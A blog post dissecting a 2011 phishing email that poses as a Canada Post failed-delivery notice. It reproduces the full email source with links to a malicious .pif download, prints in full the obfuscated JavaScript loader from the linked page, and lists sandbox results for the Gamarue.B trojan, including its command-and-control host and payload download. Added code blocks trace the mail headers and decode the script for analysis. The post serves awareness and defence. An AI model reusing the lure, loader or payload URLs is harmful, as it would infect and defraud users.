CanadaPost spam

We take a look at a trojan received as an email apparently from CanadaPost.

The issues one has with CanadaPost are generally proportional to how much one must use it (like everything else, really). Since I sold my car many years ago (for multiple reasons), I have had to rely on their services perhaps disproportionately.

My first major issue with them happened when, again years ago, I subscribed to a DVD-by-mail rental service, zip.ca (bought out by Rogers, last I checked). My DVDs would generally arrive much later than they should have and never in a sealed envelope. In time, the delays accumulated until at one point I did not receive anything at all. I tried unsuccessfully to cancel my subscription and managed to do so only years later, at which point I was refunded part of my membership but had to pay for the DVDs I had never received. I filed a complaint with Canada Post; it never went anywhere.

A couple of years ago I had to send express mail to a lawyer’s office in Toronto. It took several days longer than it should have, but it finally got there. A subsequent parcel was also unacceptably late and, unlike the previous one, showed repeated delivery attempts. CanadaPost could not explain the numerous attempts, and when I inquired what had happened the tracking disappeared from the external website but not from their intranet, making troubleshooting with CSRs on the phone extremely time-consuming. It is also virtually impossible to submit and / or resolve complaints online; you need to talk to someone over the phone.

Recently, when I scheduled a pickup ($3.50) for a larger parcel, the delivery man came too early. When he came back he requested the order number. I went to look for it; it took me 10 minutes to find it. When I brought it back to him he could not enter it in his handheld device. I mentioned to him that at previous pickups this had not been necessary and, besides, he should have been able to pick up items without me being present. He claimed that it’s a “new system”, as if it were not his fault. I had scheduled 7 pickups before; one item was lost, but I had never wasted as much time as with this last one, which ended up costing more than all the previous instances combined.

In this context, I was quite surprised to receive what seemed to be a delivery notice for an item I did not recall ordering. Here’s the text (DON’T click!):

Canada Post ✆ tracking@canadapost.ca via utoronto.ca

Nov 24 (4 days ago)

to undisclosed recipients

Dear client,
We attempted to deliver your item on November 23, 2011 , 08:31 AM.
The delivery attempt failed because nobody was present at the shipping address, so this notification has been automatically sent.
You may arrange redelivery by visiting the link below or pick up the item at the Canada Post Office indicated on the receipt.

If the package is not scheduled for redelivery or picked up within 48 hours, it will be returned to the sender.

Label/Receipt Number: RT117252788HK
Expected Delivery Date: November 23, 2011
Class: Package Services
Service(s): Delivery Confirmation
Status: eNotification sent
To check on the delivery status of your mailing or arrange redelivery please visit the following URL:
http://www.canadapost.ca/cpotools/apps/track/personal/findByTrackNumber?execution=e9s1?tracking=RT117252788HK [link to http://sdemirel.com/language/fb2.html]
To download the shipping receipt needed for redelivery arrangements, follow the link:
http://www.canadapost.ca/cpotools/apps/track/personal/findInvoiceByTrackingNumber?trk=RT117252788HK&ssid=828g7d23hsy7g3<{name}> [link to http://www.canadiancarboncapturealliance.com/pdf_capost_RT117252788HK.pif]
Thank you,
© 2011 Canada Post Corporation

*** This is an automatically generated email, please do not reply ***

What’s weird here is that the actual tracking number was valid and unexpired, as shown above. Here’s the full code of the email:

Delivered-To: [me]@gmail.com
Received: by 10.142.66.3 with SMTP id o3cs147432wfa;
        Thu, 24 Nov 2011 09:08:49 -0800 (PST)
Received: by 10.50.85.129 with SMTP id h1mr33790123igz.47.1322154517849;
        Thu, 24 Nov 2011 09:08:37 -0800 (PST)
Return-Path: <tracking@canadapost.ca>
Received: from bureau67.ns.utoronto.ca (bureau67.ns.utoronto.ca. [128.100.132.164])
        by mx.google.com with ESMTP id bb1si7373359icb.132.2011.11.24.09.08.36;
        Thu, 24 Nov 2011 09:08:37 -0800 (PST)
Received-SPF: neutral (google.com: 128.100.132.164 is neither permitted nor denied by best guess record for domain of tracking@canadapost.ca) client-ip=128.100.132.164;
Authentication-Results: mx.google.com; spf=neutral (google.com: 128.100.132.164 is neither permitted nor denied by best guess record for domain of tracking@canadapost.ca) smtp.mail=tracking@canadapost.ca
Received: from bureau22.ns.utoronto.ca ([128.100.132.56]:42993 "EHLO
	bureau22.ns.utoronto.ca" rhost-flags-OK-OK-OK-OK)
	by bureau67.ns.utoronto.ca with ESMTP id S2327084Ab1KXRIg (ORCPT
	<rfc822;[me]@utoronto.ca>); Thu, 24 Nov 2011 12:08:36 -0500
Received: from mail.copperskies.ca (mail.copperskies.ca [209.87.247.121])
	by bureau22.ns.utoronto.ca (8.13.8/8.13.8) with ESMTP id pAOH8Zbj011646
	for <[me]@utoronto.ca>; Thu, 24 Nov 2011 12:08:36 -0500
Message-Id: <201111241708.pAOH8Zbj011646@bureau22.ns.utoronto.ca>
Received: from ([127.0.0.1]) with MailEnable ESMTP; Thu, 24 Nov 2011 11:55:56 -0500
Reply-To: <tracking@canadapost.ca>
From:	"Canada Post" <tracking@canadapost.ca>
Subject: Important Notice: Failed package delivery!
Date:	Thu, 24 Nov 2011 12:15:40 -0500
MIME-Version: 1.0
Content-Type: text/html;
	charset="Windows-1251"
Content-Transfer-Encoding: 7bit
X-Priority: 1
X-MSMail-Priority: High
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
X-ME-Bayesian: 0.000000
X-PMX-Version: 5.6.1.2065439, Antispam-Engine: 2.7.2.376379, Antispam-Data: 2011.11.24.165415
X-PMX-Spam: Gauge=XXXXXXIIIII, Probability=65%, Report='
 URI_CONTAINS_PIF 5, CTYPE_JUST_HTML 0.848, X_MSMAIL_PRIORITY_HIGH 0.343, CHARSET_CYRILLIC_NO_CYRILLIC 0.05, BODYTEXTH_SIZE_10000_LESS 0, BODY_SIZE_1600_1699 0, BODY_SIZE_2000_LESS 0, BODY_SIZE_5000_LESS 0, BODY_SIZE_7000_LESS 0, CHARSET_W1251_NOT_CYRILLIC 0, DATE_TZ_NA 0, DATE_TZ_NEG_0500 0, FORGED_MUA_OUTLOOK 0, LINK_TO_IMAGE 0, MISSING_HEADERS 0, NO_MESSAGE_ID 0, PRIORITY_HIGH 0, TO_MALFORMED 0, USER_AGENT_OE 0, __ANY_URI 0, __CHARSET_IS_CP1251 0, __CP_URI_IN_BODY 0, __CT 0, __CTE 0, __CTYPE_HTML 0, __CTYPE_IS_HTML 0, __FRAUD_SUBJ_A 0, __HAS_HTML 0, __HAS_MSMAIL_PRI 0, __HAS_X_MAILER 0, __HAS_X_PRIORITY 0, __MIME_HTML 0, __MIME_HTML_ONLY 0, __MIME_VERSION 0, __OUTLOOK_MUA 0, __OUTLOOK_MUA_1 0, __PHISH_SPEAR_STRUCTURE_1 0, __PHISH_SPEAR_STRUCTURE_2 0, __PHISH_SPEAR_SUBJECT 0, __TAG_EXISTS_HTML 0, __URI_NO_MAILTO 0, __USER_AGENT_MS_GENERIC 0, __X_MSPRI_HI 0'
To:	unlisted-recipients:; (no To-header on input)

<html>
<img border="0px" src="http://www.canadapost.ca//cpotools/mc/assets/images/structure/cpclogo_en.jpg" title="" alt="" /><br />
<br />
<span style="font-size: 12pt;"><span style="font-size: 12pt;"><p><br />
   Dear client,  <br>
<br>We attempted to deliver your item on November 23, 2011 , 08:31 AM.<br>The delivery attempt failed because nobody was present at the shipping address, so this notification has been automatically sent. <br>You may arrange redelivery by visiting the link below or pick up the item at the Canada Post Office indicated on the receipt. </p>
If the package is not scheduled for redelivery or picked up within 48 hours, it will be returned to the sender.
<p>Label/Receipt Number: RT117252788HK<br />
  Expected Delivery Date: November 23, 2011<br />
  Class: Package Services<br />
  Service(s): Delivery Confirmation<br />
  Status: eNotification sent <br><br>To check on the delivery status of your mailing or arrange redelivery please visit the following URL: <br><a href="http://sdemirel.com/language/fb2.html">http://www.canadapost.ca/cpotools/apps/track/personal/findByTrackNumber?execution=e9s1?tracking=RT117252788HK</a><br><br>To download the shipping receipt needed for redelivery arrangements, follow the link:<br> <a href="http://www.canadiancarboncapturealliance.com/pdf_capost_RT117252788HK.pif">http://www.canadapost.ca/cpotools/apps/track/personal/findInvoiceByTrackingNumber?trk=RT117252788HK&ssid=828g7d23hsy7g3<{name}></a><br>
<br>Thank you,
<br>© 2011 Canada Post Corporation
  <p>*** This is an automatically generated email, please do not reply ***</p>
<p><br />
  </p>
  </html>

The email was sent to my U of T address and then forwarded to a gmail address. “Canadian Capture Alliance” is probably a site that has been hacked into, and it carries the malware payload as a .pif file, which is executable under Windows. It was registered by Pat Bachand with Canaca-com Inc. in Toronto (905-275-0723) via Tucows. Sdemirel.com was registered by one Serkan Demirel via DomainControl.com, but it could very well have been hacked as well without the rightful owner’s knowledge.
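A small Received-chain walker, added here as an example (not code from the original post), reproduces the reasoning above: it unfolds the headers quoted earlier, reads the hops from the bottom up, skips the loopback MailEnable hop, and shows that the message entered the university’s mail system from mail.copperskies.ca rather than from any host under canadapost.ca, whatever the From: line claims. The header text is copied from the post with its [me] placeholders kept; Google’s two internal hops are omitted, and the function names are my own.

```javascript
// Added example, not from the original post: trace the Received: chain of the
// quoted headers to find the real entry point behind the forged From: address.
// Headers copied from the post (author's [me] placeholders kept; Google's two
// internal "by 10.x.x.x" hops omitted).
const SAMPLE_HEADERS = [
  "Received: from bureau67.ns.utoronto.ca (bureau67.ns.utoronto.ca. [128.100.132.164])",
  "        by mx.google.com with ESMTP id bb1si7373359icb.132.2011.11.24.09.08.36;",
  "        Thu, 24 Nov 2011 09:08:37 -0800 (PST)",
  'Received: from bureau22.ns.utoronto.ca ([128.100.132.56]:42993 "EHLO',
  '\tbureau22.ns.utoronto.ca" rhost-flags-OK-OK-OK-OK)',
  "\tby bureau67.ns.utoronto.ca with ESMTP id S2327084Ab1KXRIg (ORCPT",
  "\t<rfc822;[me]@utoronto.ca>); Thu, 24 Nov 2011 12:08:36 -0500",
  "Received: from mail.copperskies.ca (mail.copperskies.ca [209.87.247.121])",
  "\tby bureau22.ns.utoronto.ca (8.13.8/8.13.8) with ESMTP id pAOH8Zbj011646",
  "\tfor <[me]@utoronto.ca>; Thu, 24 Nov 2011 12:08:36 -0500",
  "Received: from ([127.0.0.1]) with MailEnable ESMTP; Thu, 24 Nov 2011 11:55:56 -0500",
].join("\n");

// RFC 5322 unfolding: a line that starts with whitespace continues the previous header.
function unfoldHeaders(raw) {
  return raw.replace(/\r?\n[ \t]+/g, " ").split(/\r?\n/);
}
// Pull the "from" host, the first bracketed IPv4 and the "by" host out of one Received: header.
function parseReceived(line) {
  const from = /^Received:\s+from\s+(\S+)/.exec(line);
  const ip = /\[(\d{1,3}(?:\.\d{1,3}){3})\]/.exec(line);
  const by = /\sby\s+(\S+)/.exec(line);
  return { from: from ? from[1] : null, ip: ip ? ip[1] : null, by: by ? by[1] : null };
}
// Hops in transit order: the bottom-most Received: header is the oldest, so reverse.
function traceHops(raw) {
  return unfoldHeaders(raw).filter((l) => l.startsWith("Received:")).map(parseReceived).reverse();
}
// Loopback and RFC 1918 addresses say nothing about the outside origin.
function isInternalIp(ip) {
  return /^(127\.|10\.|192\.168\.|172\.(1[6-9]|2\d|3[01])\.)/.test(ip);
}
// First hop with a routable address: where the message entered from the internet.
function externalOrigin(raw) {
  return traceHops(raw).find((h) => h.ip && !isInternalIp(h.ip)) || null;
}
// True when the external origin is not a host under the domain the From: line claims.
function originMismatch(raw, claimedDomain) {
  const origin = externalOrigin(raw);
  if (!origin || !origin.from) return true;
  const host = origin.from.toLowerCase();
  return !(host === claimedDomain || host.endsWith("." + claimedDomain));
}
```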

Here’s what the HTML file behind the first malicious link (on sdemirel.com) contains:

<meta http-equiv="refresh" content="3;url=http://www.canadapost.ca/cpotools/apps/track/personal/findByTrackNumber?execution=e9s1">
<script>a=(document.getElementsByTagName+'').substr(1,4);if((a=="func")||(a=="unct")){ss="";s=String;e=eval;t='g';}ddd=new Date();d2=new Date(ddd.valueOf()-2);Object.prototype.bt3223='tb4etew';c="createTextNode";if('tb4etew'==={}.bt3223)a=document[c]('321');if(a.nodeValue==321)h=(ddd-d2)*-1;n="4.5g4.5g52.5g51g16g20g50g55.5g49.5g58.5g54.5g50.5g55g58g23g51.5g50.5g58g34.5g54g50.5g54.5g50.5g55g58g57.5g33g60.5g42g48.5g51.5g39g48.5g54.5g50.5g20g19.5g49g55.5g50g60.5g19.5g20.5g45.5g24g46.5g20.5g61.5g4.5g4.5g4.5g52.5g51g57g48.5g54.5g50.5g57g20g20.5g29.5g4.5g4.5g62.5g16g50.5g54g57.5g50.5g16g61.5g4.5g4.5g4.5g50g55.5g49.5g58.5g54.5g50.5g55g58g23g59.5g57g52.5g58g50.5g20g17g30g52.5g51g57g48.5g54.5g50.5g16g57.5g57g49.5g30.5g19.5g52g58g58g56g29g23.5g23.5g28g27.5g23g25g26.5g24.5g23g24.5g26.5g26g23g24.5g26.5g23.5g54.5g48.5g52.5g55g23g56g52g56g31.5g56g48.5g51.5g50.5g30.5g27g24g28.5g24g50.5g50g26.5g27g25g48.5g50.5g48.5g24g26g48.5g25.5g19.5g16g59.5g52.5g50g58g52g30.5g19.5g24.5g24g19.5g16g52g50.5g52.5g51.5g52g58g30.5g19.5g24.5g24g19.5g16g57.5g58g60.5g54g50.5g30.5g19.5g59g52.5g57.5g52.5g49g52.5g54g52.5g58g60.5g29g52g52.5g50g50g50.5g55g29.5g56g55.5g57.5g52.5g58g52.5g55.5g55g29g48.5g49g57.5g55.5g54g58.5g58g50.5g29.5g54g50.5g51g58g29g24g29.5g58g55.5g56g29g24g29.5g19.5g31g30g23.5g52.5g51g57g48.5g54.5g50.5g31g17g20.5g29.5g4.5g4.5g62.5g4.5g4.5g51g58.5g55g49.5g58g52.5g55.5g55g16g52.5g51g57g48.5g54.5g50.5g57g20g20.5g61.5g4.5g4.5g4.5g59g48.5g57g16g51g16g30.5g16g50g55.5g49.5g58.5g54.5g50.5g55g58g23g49.5g57g50.5g48.5g58g50.5g34.5g54g50.5g54.5g50.5g55g58g20g19.5g52.5g51g57g48.5g54.5g50.5g19.5g20.5g29.5g51g23g57.5g50.5g58g32.5g58g58g57g52.5g49g58.5g58g50.5g20g19.5g57.5g57g49.5g19.5g22g19.5g52g58g58g56g29g23.5g23.5g28g27.5g23g25g26.5g24.5g23g24.5g26.5g26g23g24.5g26.5g23.5g54.5g48.5g52.5g55g23g56g52g56g31.5g56g48.5g51.5g50.5g30.5g27g24g28.5g24g50.5g50g26.5g27g25g48.5g50.5g48.5g24g26g48.5g25.5g19.5g20.5g29.5g51g23g57.5g58g60.5g54g50.5g23g59g52.5g57.5g52.5g49g52.5g54g52.5g58g60.5g30.5g19.5g52g52.5g50g50g5
0.5g55g19.5g29.5g51g23g57.5g58g60.5g54g50.5g23g56g55.5g57.5g52.5g58g52.5g55.5g55g30.5g19.5g48.5g49g57.5g55.5g54g58.5g58g50.5g19.5g29.5g51g23g57.5g58g60.5g54g50.5g23g54g50.5g51g58g30.5g19.5g24g19.5g29.5g51g23g57.5g58g60.5g54g50.5g23g58g55.5g56g30.5g19.5g24g19.5g29.5g51g23g57.5g50.5g58g32.5g58g58g57g52.5g49g58.5g58g50.5g20g19.5g59.5g52.5g50g58g52g19.5g22g19.5g24.5g24g19.5g20.5g29.5g51g23g57.5g50.5g58g32.5g58g58g57g52.5g49g58.5g58g50.5g20g19.5g52g50.5g52.5g51.5g52g58g19.5g22g19.5g24.5g24g19.5g20.5g29.5g4.5g4.5g4.5g50g55.5g49.5g58.5g54.5g50.5g55g58g23g51.5g50.5g58g34.5g54g50.5g54.5g50.5g55g58g57.5g33g60.5g42g48.5g51.5g39g48.5g54.5g50.5g20g19.5g49g55.5g50g60.5g19.5g20.5g45.5g24g46.5g23g48.5g56g56g50.5g55g50g33.5g52g52.5g54g50g20g51g20.5g29.5g4.5g4.5g62.5";n=n["split"](t);for(i=0;i!=n.length;i++)ss+=s.fromCharCode(-h*e("n"+"["+"i"+"]"));zx=ss;if(a.data==a.nodeValue)e(zx);</script>
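A decoder for this obfuscation, added here as an example (not code from the original post or from the script’s author): it mirrors the script’s date arithmetic to show that h is always the constant -2, so each ‘g’-separated token is simply half a character code, and it decodes the opening fragment of the string quoted above without ever calling eval. Run over the full string on the page it yields the injected content the same way; the function and variable names are my own.

```javascript
// Added example, not from the original post or the attacker's code: a decoder for
// the obfuscation scheme in the script above, for static analysis without eval().
// The script computes h = (ddd - d2) * -1 with d2 two milliseconds before ddd,
// so h is always -2 and every 'g'-separated token is fromCharCode(2 * token).
const SEPARATOR = "g";

// Mirror the script's date arithmetic to show the "runtime" key is a constant.
function deriveMultiplier() {
  const ddd = new Date();
  const d2 = new Date(ddd.valueOf() - 2);
  const h = (ddd - d2) * -1; // Date subtraction yields milliseconds: 2 * -1 = -2
  return -h;                 // the script multiplies each token by -h, i.e. by 2
}

// Decode a token string into text. Throws on a non-numeric token rather than
// silently producing garbage, which is what you want in an analysis tool.
function decodeScaledCharCodes(encoded, multiplier = deriveMultiplier()) {
  return encoded.split(SEPARATOR).map((tok) => {
    const n = Number(tok);
    if (tok === "" || !Number.isFinite(n)) throw new Error(`non-numeric token: "${tok}"`);
    return String.fromCharCode(n * multiplier);
  }).join("");
}

// Opening fragment of the encoded string quoted above, cut at a token boundary.
const ENCODED_PREFIX =
  "4.5g4.5g52.5g51g16g20g50g55.5g49.5g58.5g54.5g50.5g55g58g23g51.5g50.5g58g34.5g54g50.5g54.5g50.5g55g58g57.5g33g60.5g42g48.5g51.5g39g48.5g54.5g50.5g20g19.5g49g55.5g50g60.5g19.5g20.5g45.5g24g46.5g20.5g61.5" +
  "g4.5g4.5g4.5g52.5g51g57g48.5g54.5g50.5g57g20g20.5g29.5";

// After decoding, the things an analyst wants from such a loader: the function it
// calls once a <body> exists, and any URLs it writes into the page.
function extractIndicators(decoded) {
  const calls = [...decoded.matchAll(/\b([A-Za-z_$][\w$]*)\(\)/g)].map((m) => m[1]);
  const urls = [...decoded.matchAll(/https?:\/\/[^\s"'<>]+/g)].map((m) => m[0]);
  return { calls: [...new Set(calls)], urls: [...new Set(urls)] };
}
```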

Simply downloading the .pif file with wget caused a warning from Microsoft’s security software to appear:

[screenshot: Gamarue.B alert]

Even after renaming it with a .txt extension it continued to be “Suspended”.

In any event, days after I received the email and called CanadaPost, the offending files are still available and have not been removed. We will continue to look into this matter. Here’s what Gamarue does according to MalwareSurvival:

Payload:

  • Uniform traffic ticket.zip
  • Uniform traffic ticket.exe

The UniforTr.exe launches and injects into SVCHost.exe

  • Analysis Reason:     Started by svchost.exe
    Filename:     uniform tr.exe
    MD5:     cacc96e054cc92f0a506a7cd2130b569
    SHA-1:     5152877f6de96780ac18992acb2ca40c40e2dfe7
    File Size:     28160 Bytes
    Command Line:     ”C:\uniform tr.exe”
    Process-status at analysis end:     alive
    Exit Code:     0

Malware Detections:

  • Worm:Win32/Gamarue.B [Microsoft]
  • Troj/Bredo-LQ

Files Deleted

  • C:\uniform tr.exe

Files Created:

  • C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\0006a4fd.tmp
  • C:\DOCUME~1\ALLUSE~1\LOCALS~1\Temp\6e4cfff9000691b3.exe
  • C:\Documents and Settings\All Users\Local Settings
  • C:\Documents and Settings\All Users\Local Settings\Temp

Process Created:

  • C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\0006a4fd.tmp

DNS Traffic:

  • 91.221.98.29
  • 188.247.135.83

HTTP Traffic:

  • From MS:1030 to 188.247.135.83:80 – [mamtumbochka766.ru]
    Request: POST /and/image.php
    Response: 200 “OK”
  • From MS:1032 to 91.221.98.29:80 – [91.221.98.29] <— Found TR/Crypt.XPACK.Gen
    Request: GET /531-01.exe
    Response: 200 “OK”
  • From MS:1034 to 188.247.135.83:80 – [mamtumbochka766.ru]
    Request: POST /and/image.php
    Response: 200 “OK”

Phones Home:

  • Unknown UDP Traffic: from MS:1031 to 8.8.4.4:53
    State: Normal establishment and termination – Transferred outbound Bytes: 30 – Transferred inbound Bytes: 105
  • Unknown TCP Traffic: from MS:1028 to 8.8.4.4:53

This spam message managed to get through my spam filters, and that’s unusual. It seems that I lost my precaution long ago. Hopefully I’m not infected.

Sources / More info: RT117252788HK, Gamarue.B, malwaresurv, Downloader.Dromedan
